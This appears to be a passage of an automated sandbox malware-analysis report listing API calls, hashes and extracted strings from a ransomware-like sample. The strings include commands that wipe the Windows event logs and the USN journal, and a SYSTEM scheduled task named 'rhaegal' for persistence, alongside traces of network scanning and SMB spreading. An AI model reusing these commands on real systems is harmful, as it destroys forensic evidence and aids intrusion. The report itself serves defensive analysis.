                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                              • String ID: ADMIN$$cscc.dat
                                              • API String ID: 228017060-1100196981
                                              • Opcode ID: c2106cf46260ba3c8f1bf6541ec01f76adf708b6b31dfeadef89843603cb8de8
                                              • Instruction ID: b770371e464bbd7867f9ab1895a7a8dab792687c869dd130c90ec932c572b813
                                              • Opcode Fuzzy Hash: c2106cf46260ba3c8f1bf6541ec01f76adf708b6b31dfeadef89843603cb8de8
                                              • Instruction Fuzzy Hash: FB514F71900319BBDF209FA4DC48EEF7B7DEF08355F004955BA1AA7151D775AA08CB60

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04BF5414,00000000,?,0BADF00D,?,?,?,?,04BF943A,?), ref: 04BF1CBD
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,04BF943A,?), ref: 04BF1CC6
                                              • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,04BF943A,?), ref: 04BF1CD7
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF1CDA
                                              • htons.WS2_32(0000002F), ref: 04BF1CF7
                                              • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04BF1D26
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF1D3D
                                                • Part of subcall function 04BF1747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04BF1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04BF1783
                                                • Part of subcall function 04BF1747: HeapAlloc.KERNEL32(00000000), ref: 04BF178C
                                                • Part of subcall function 04BF1747: CharUpperW.USER32(00000000), ref: 04BF17B2
                                                • Part of subcall function 04BF1747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 04BF17DA
                                                • Part of subcall function 04BF1747: HeapAlloc.KERNEL32(00000000), ref: 04BF17DD
                                                • Part of subcall function 04BF1747: htons.WS2_32(00000082), ref: 04BF1801
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A,?), ref: 04BF1DA8
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF1DAF
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04BF943A,?), ref: 04BF1DBA
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF1DC1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Freehtons$AllocateCharUpperrecvsend
                                              • String ID: NT LM 0.12$x
                                              • API String ID: 30026595-3673895198
                                              • Opcode ID: bcd3d4be776394c94530cd57324ef0f16b4aaff364ebfdc124baac7240a54365
                                              • Instruction ID: 75731b55b1be04af54b62485a45330eaeec43351c0d7d338acff6ae23d326a22
                                              • Opcode Fuzzy Hash: bcd3d4be776394c94530cd57324ef0f16b4aaff364ebfdc124baac7240a54365
                                              • Instruction Fuzzy Hash: 5931BD36900249FBEF128FE8DC48B5A7F79EF45310F048495FA09AB191C675A909DB60
                                              APIs
                                              • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 04BF734A
                                              • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04BF7363
                                              • GetProcessHeap.KERNEL32(00000008,00100000), ref: 04BF737E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04BF7385
                                              • wsprintfW.USER32 ref: 04BF73DC
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF7405
                                              • RtlFreeHeap.NTDLL(00000000), ref: 04BF740C
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF7856), ref: 04BF7414
                                              • FreeLibrary.KERNEL32(?), ref: 04BF741D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorLastLoadProcwsprintf
                                              • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                              • API String ID: 2876140663-442984071
                                              • Opcode ID: dadeb3dd69f4cbfa96e2c51bf08f1e7d6bdfa640d9e8f57fbd0998c9b5db4e97
                                              • Instruction ID: 0e230ad930161d3d8cf6293b7861b9a75311a4345201c0b470329a52dbb060ea
                                              • Opcode Fuzzy Hash: dadeb3dd69f4cbfa96e2c51bf08f1e7d6bdfa640d9e8f57fbd0998c9b5db4e97
                                              • Instruction Fuzzy Hash: F0217172900215ABDB115FE8CC49EAEBBBDEF48701F0445A6F646E6141DB78E905CBB0
                                              APIs
                                              • FreeLibrary.KERNELBASE ref: 04BF9161
                                              • CreateFileW.KERNELBASE(04C07BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04BF9198
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 04BF91A3
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04BF91AF
                                              • CreateFileW.KERNELBASE(04C07BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04BF91C1
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF91D5
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04BF91D8
                                              • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 04BF91F1
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF91FB
                                              • HeapFree.KERNEL32(00000000), ref: 04BF91FE
                                              • CloseHandle.KERNEL32(?), ref: 04BF9207
                                              • DeleteFileW.KERNELBASE(04C07BC8), ref: 04BF920E
                                              • ExitProcess.KERNEL32 ref: 04BF9234
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                              • String ID:
                                              • API String ID: 1556359713-0
                                              • Opcode ID: be27338553d60d296b198343f59c8388b5b9b6600502c83c885eb8fdc06cadb6
                                              • Instruction ID: 47fec448fed7ea1903348fc843eac067f1447da1a7d09fcfcf78eb36f1abd25b
                                              • Opcode Fuzzy Hash: be27338553d60d296b198343f59c8388b5b9b6600502c83c885eb8fdc06cadb6
                                              • Instruction Fuzzy Hash: CF2116B5802214BBEF116FE1EC4CE8EBF7DEF49311F104452F60AA2150C638AA51DBA0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Similarity
                                              • API ID: wsprintf
                                              • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                              • API String ID: 2111968516-1905612841
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1DE9
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1DF2
                                              • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E04
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E07
                                              • htons.WS2_32(00000027), ref: 04BF1E21
                                              • send.WS2_32(?,00000000,0000002B,00000000), ref: 04BF1E4A
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF1E63
                                              • memset.MSVCRT ref: 04BF1E81
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E90
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E97
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1EA2
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1EA9
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                              • String ID:
                                              • API String ID: 255267840-0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF206D
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2076
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04BF943A), ref: 04BF209C
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF209F
                                              • htons.WS2_32(?), ref: 04BF20BC
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF2131
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF2148
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A), ref: 04BF2168
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF216F
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04BF943A), ref: 04BF217A
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2181
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                              • String ID:
                                              • API String ID: 1780562090-0
                                              APIs
                                              • GetSystemMetrics.USER32(00002000), ref: 04BF8A81
                                              • Sleep.KERNELBASE(000001F4), ref: 04BF8A90
                                              • GetSystemMetrics.USER32(00002000), ref: 04BF8A93
                                              • SetEvent.KERNEL32(?), ref: 04BF8A9C
                                              • Sleep.KERNEL32(000003E8), ref: 04BF8AAB
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AD4
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AE1
                                              • inet_ntoa.WS2_32(00000000), ref: 04BF8AE4
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 04BF8B02
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 04BF8B09
                                              • LocalFree.KERNEL32(?), ref: 04BF8B1F
                                              Similarity
                                              • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                              • String ID:
                                              • API String ID: 4223591894-0
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF7FD6
                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                              • Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              Similarity
                                              • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                              • String ID: /c %ws$ComSpec$\cmd.exe
                                              • API String ID: 1518394870-1564754240
                                              APIs
                                                • Part of subcall function 04BF7FB7: wsprintfW.USER32 ref: 04BF7FD6
                                                • Part of subcall function 04BF7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                                • Part of subcall function 04BF7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                                • Part of subcall function 04BF7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                                • Part of subcall function 04BF7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                                • Part of subcall function 04BF7FB7: Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04BF1021
                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04BF1039
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04BF104B
                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF1061
                                              • wsprintfW.USER32 ref: 04BF1087
                                              Strings
                                              • ComSpec, xrefs: 04BF1034
                                              • schtasks /Delete /F /TN rhaegal, xrefs: 04BF100E
                                              • \cmd.exe, xrefs: 04BF1055
                                              • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04BF1081
                                              Similarity
                                              • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                              • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                              • API String ID: 2538701606-2521368254
                                              APIs
                                              • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04BF1204
                                              • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 04BF124F
                                              • memmove.MSVCRT ref: 04BF1302
                                              • memcpy.MSVCRT ref: 04BF1315
                                              • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04BF1334
                                              • RegFlushKey.ADVAPI32(00000800), ref: 04BF1344
                                              • RegCloseKey.KERNELBASE(00000800), ref: 04BF1359
                                              Similarity
                                              • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                              • String ID: cscc
                                              • API String ID: 3731182797-3289078142
                                              APIs
                                              • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04BF7448
                                              • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04BF7466
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF746D
                                              • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04BF7486
                                              • wsprintfW.USER32 ref: 04BF74D8
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF7504
                                              • HeapFree.KERNEL32(00000000), ref: 04BF750B
                                              Similarity
                                              • API ID: Heap$ProcessTable$AllocFreewsprintf
                                              • String ID: %u.%u.%u.%u
                                              • API String ID: 2259129056-1542503432
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,771ADF60,771AF380,?,?,04BF6A84,?,?,?), ref: 04BF6E87
                                                • Part of subcall function 04BF6DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6DB5
                                                • Part of subcall function 04BF6DA4: LeaveCriticalSection.KERNEL32(?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6E0C
                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04BF6A84,?,?,?), ref: 04BF6EB8
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6EC1
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,04BF6A84,?,?,?), ref: 04BF6ED9
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6EDC
                                              • memcpy.MSVCRT ref: 04BF6F0D
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,04BF6A84,?,?,?), ref: 04BF6F26
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F29
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F41
                                              • HeapReAlloc.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F48
                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F6C
                                              Similarity
                                              • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                              • String ID:
                                              • API String ID: 1369668251-0
                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 04BF10DD
                                              • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 04BF119F
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF11DC
                                              • HeapFree.KERNEL32(00000000), ref: 04BF11E3
                                              Similarity
                                              • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                              • String ID: %ALLUSERSPROFILE%$\$dispci.exe
                                              • API String ID: 1077166327-497635308
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 04BF781B
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 04BF783D
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04BF7848
                                              • Sleep.KERNEL32(0002BF20,?,?), ref: 04BF7874
                                              Similarity
                                              • API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
                                              • String ID: 0.0.0.0$127.0.0.1$localhost
                                              • API String ID: 3743365020-4042105963
                                              APIs
                                              • memset.MSVCRT ref: 04BFA4A5
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 04BFA4C3
                                              • htons.WS2_32(?), ref: 04BFA4E3
                                              • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 04BFA4F7
                                              • connect.WS2_32(00000000,?,00000010), ref: 04BFA509
                                              • select.WS2_32(00000001,00000000,?,00000000,?), ref: 04BFA536
                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 04BFA549
                                              • closesocket.WS2_32(00000000), ref: 04BFA557
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                              • String ID:
                                              • API String ID: 1369790671-0
                                              • Opcode ID: d1789b17dc61f876b5088f87a630835f0a8eaded793efff0bfa346a642a9c7fa
                                              • Instruction ID: d42b723de07398904ba373d54503eab1b928c001deaca99915e03bff934e358d
                                              • Opcode Fuzzy Hash: d1789b17dc61f876b5088f87a630835f0a8eaded793efff0bfa346a642a9c7fa
                                              • Instruction Fuzzy Hash: A1314F71900219BFDB10DFA8CC48EEEBBBCEF48314F00456AE65AE3150D7789A558B65
                                              APIs
                                              • GetComputerNameW.KERNEL32(?,?), ref: 04BF7F3B
                                              • wsprintfW.USER32 ref: 04BF7F7F
                                              • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 04BF7F8E
                                              • GetLastError.KERNEL32 ref: 04BF7F99
                                              • GetLastError.KERNEL32 ref: 04BF7FAB
                                              Strings
                                              Similarity
                                              • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                              • String ID: %08X%08X
                                              • API String ID: 4289762557-1563805794
                                              • Opcode ID: 59fcd3a031d5b3fda11b7287e171ad87594887d9ad583bfedf38150ec34132c3
                                              • Instruction ID: 43d8f8af1ac91befd5ded2da5b803578f313049cc1dc66d5481a37aaaa6b92ab
                                              • Opcode Fuzzy Hash: 59fcd3a031d5b3fda11b7287e171ad87594887d9ad583bfedf38150ec34132c3
                                              • Instruction Fuzzy Hash: A3115172A00149ABEF10DBE8DD849EEB7BDEF48304F5005A6E609E3140DB74AE1987B1
                                              APIs
                                              • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 04BF75FD
                                              • GlobalAlloc.KERNELBASE(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04BF7611
                                              • memset.MSVCRT ref: 04BF762C
                                              • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04BF7640
                                              • GlobalFree.KERNEL32(00000000), ref: 04BF76D9
                                              • WNetCloseEnum.MPR(0000FFFF), ref: 04BF76E2
                                              Similarity
                                              • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                              • String ID:
                                              • API String ID: 4070278229-0
                                              • Opcode ID: d4a0d48d23470161fe4e0b40253d2dc649e4e771107d24114345e105b53b455f
                                              • Instruction ID: 019f953e22c33a6c14701a1e31003122ea822bec6ddfae2bcd4898235f80b6dd
                                              • Opcode Fuzzy Hash: d4a0d48d23470161fe4e0b40253d2dc649e4e771107d24114345e105b53b455f
                                              • Instruction Fuzzy Hash: F131A671800119FFDF20AF99CC84DAEBBB9FF49304B1180E9E61DA7150DB34AA59DB61
                                              APIs
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AD4
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AE1
                                              • inet_ntoa.WS2_32(00000000), ref: 04BF8AE4
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                                • Part of subcall function 04BF641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                                • Part of subcall function 04BF641A: HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 04BF8B02
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 04BF8B09
                                              • LocalFree.KERNEL32(?), ref: 04BF8B1F
                                              Similarity
                                              • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                              • String ID:
                                              • API String ID: 3470587009-0
                                              • Opcode ID: d736a23d8c1b6cdde4a70baaf30226ba447c7f42547743a1ec4c0cfd1cdfc0fe
                                              • Instruction ID: f0396b901729b1dd4b5bbb907a088464a959e0bc60cd48c2c4e71ec17331a815
                                              • Opcode Fuzzy Hash: d736a23d8c1b6cdde4a70baaf30226ba447c7f42547743a1ec4c0cfd1cdfc0fe
                                              • Instruction Fuzzy Hash: 7B015EB2A10714ABDB01AFE5DD88D4FB7ACEF483147004859E60AE3201D738FE058AB0
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 04BFA035
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BFA1D0,00000000), ref: 04BFA03C
                                              • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04BFA059
                                              • CloseHandle.KERNEL32(?,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA0F5
                                              • CloseHandle.KERNEL32(0000FFFF,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA105
                                              Similarity
                                              • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                              • String ID:
                                              • API String ID: 3602278934-0
                                              • Opcode ID: 94d7701b17d3d90bf252811981e0d18f0f14c0011ca65e8eede6092de45b2392
                                              • Instruction ID: 9a8e2c987553c2fb6f5074c486195863ced0b14bd5d700290775235587c1cd4f
                                              • Opcode Fuzzy Hash: 94d7701b17d3d90bf252811981e0d18f0f14c0011ca65e8eede6092de45b2392
                                              • Instruction Fuzzy Hash: 4A217E71504301AAE220EF75DC49E5FBBECEFC9714F00496ABA4DD2051EA74E919CBA2
                                              APIs
                                              • PathFindFileNameW.SHLWAPI(04C07BC8,?,00000000,00000000), ref: 04BF939C
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 04BF93C8
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 04BF93DF
                                              • inet_addr.WS2_32(?), ref: 04BF93E8
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04BF9418
                                                • Part of subcall function 04BF9332: gethostbyname.WS2_32(04BF93FF), ref: 04BF933B
                                                • Part of subcall function 04BF9332: wsprintfA.USER32 ref: 04BF9365
                                              Similarity
                                              • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                              • String ID:
                                              • API String ID: 3160354238-0
                                              • Opcode ID: 5a3765101feccdcb207c6379b4cddada35db28da603d80813c2fe6575e98a952
                                              • Instruction ID: b4698c6cc43ddf96639be886871835187953adfc75482ddcdc94433d59bd650f
                                              • Opcode Fuzzy Hash: 5a3765101feccdcb207c6379b4cddada35db28da603d80813c2fe6575e98a952
                                              • Instruction Fuzzy Hash: 002100B290011CBEEF50DE98DCC4EEE777CEB04364F5042A6F629D2190D674AE499B60
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C6F
                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C78
                                              • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C81
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6CAC
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6CAF
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C29
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C2C
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C39
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C3C
